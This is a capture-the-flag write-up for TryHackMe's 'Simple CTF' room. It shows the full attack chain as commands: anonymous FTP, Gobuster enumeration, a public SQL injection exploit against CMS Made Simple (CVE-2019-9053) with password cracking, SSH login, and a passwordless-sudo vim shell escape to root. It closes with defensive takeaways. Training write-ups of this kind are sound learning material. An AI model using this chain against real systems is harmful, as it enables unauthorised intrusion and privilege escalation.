===========================================================
       CTF WRITE-UP: Simple CTF — TryHackMe
===========================================================
Platform : TryHackMe
Machine  : Simple CTF
Difficulty: Easy
Tags     : FTP, CMS Made Simple, SQLi, GTFOBins, SSH
===========================================================


-----------------------------------------------------------
INTRODUCTION
-----------------------------------------------------------

Simple CTF is one of those rooms that packs a surprising amount of
learning into a short timeframe. Don't let the "easy" rating make you
sloppy — there's anonymous FTP, a SQL injection exploit against a CMS,
and a GTFOBins privilege escalation all waiting for you. Perfect for
getting comfortable with the fundamentals.


-----------------------------------------------------------
STEP 1 — RECONNAISSANCE (NMAP)
-----------------------------------------------------------

Kicked things off with the usual Nmap scan:

    nmap -sC -sV -oN nmap_scan.txt <target-ip>

Three ports came back:

  - Port 21   : FTP (vsftpd) — anonymous login allowed
  - Port 80   : HTTP (Apache)
  - Port 2222 : SSH (OpenSSH)

Two things caught my eye right away: FTP with anonymous login and SSH
running on a non-standard port (2222 instead of the default 22). I
went for FTP first.


-----------------------------------------------------------
STEP 2 — ANONYMOUS FTP ENUMERATION
-----------------------------------------------------------

Logged in without credentials:

    ftp <target-ip>
    Name: anonymous
    Password: (blank/enter)

    cd pub
    ls
    get ForMitch.txt

The file contained a note that was clearly addressed to someone called
"Mitch", hinting that his password was way too weak. We now had a
potential username to work with.


-----------------------------------------------------------
STEP 3 — WEB ENUMERATION (GOBUSTER)
-----------------------------------------------------------

With anonymous FTP not giving us much more, I turned to the web server
and ran Gobuster against it:

    gobuster dir -u http://<target-ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Gobuster found /simple — not visible from the root page. Navigating to
it revealed a full CMS Made Simple installation running version 2.2.8.
A quick ExploitDB search turned up CVE-2019-9053, a time-based blind
SQL injection in the CMS's search module. Game on.


-----------------------------------------------------------
STEP 4 — EXPLOITATION (CVE-2019-9053 — SQLi)
-----------------------------------------------------------

I grabbed the exploit script from ExploitDB and ran it with the
rockyou wordlist for cracking:

    python3 46635.py -u http://<target-ip>/simple --crack -w /usr/share/wordlists/rockyou.txt

(Note: the script requires the termcolor Python module — install it
with pip install termcolor if it errors out.)

The exploit ran through its blind injection routine and came back with:

  - Username : mitch
  - Password : secret (cracked from the hash)

The same Mitch from the FTP note. Classic.


-----------------------------------------------------------
STEP 5 — SSH ACCESS & USER FLAG
-----------------------------------------------------------

With the credentials, I SSH'd in on the non-standard port:

    ssh mitch@<target-ip> -p 2222

We're in. A quick ls confirmed user.txt was right there:

    cat user.txt

    FLAG: [user flag here]

While poking around the home directory, there was another user present:
sunbath.


-----------------------------------------------------------
STEP 6 — PRIVILEGE ESCALATION (SUDO + VIM)
-----------------------------------------------------------

Standard first check after landing a shell:

    sudo -l

Output:

    (root) NOPASSWD: /usr/bin/vim

Vim can be executed as root with no password required. GTFOBins has
this covered perfectly. One command:

    sudo vim -c ':!/bin/sh'

Root shell, instantly. No further steps needed.

    whoami
    root


-----------------------------------------------------------
STEP 7 — ROOT FLAG
-----------------------------------------------------------

    cat /root/root.txt

    FLAG: [root flag here]


-----------------------------------------------------------
SUMMARY & TAKEAWAYS
-----------------------------------------------------------

A clean five-step chain:

  1. Anonymous FTP gave us a username (mitch).
  2. Gobuster uncovered a hidden CMS installation at /simple.
  3. An outdated CMS had a public SQL injection CVE.
  4. Cracking the hash gave us SSH credentials.
  5. A passwordless sudo rule on vim handed us root in one command.

Defensively: disable anonymous FTP, patch your CMS, and never grant
text editors passwordless sudo rights — they all spawn shells.

===========================================================
                     END OF WRITE-UP
===========================================================
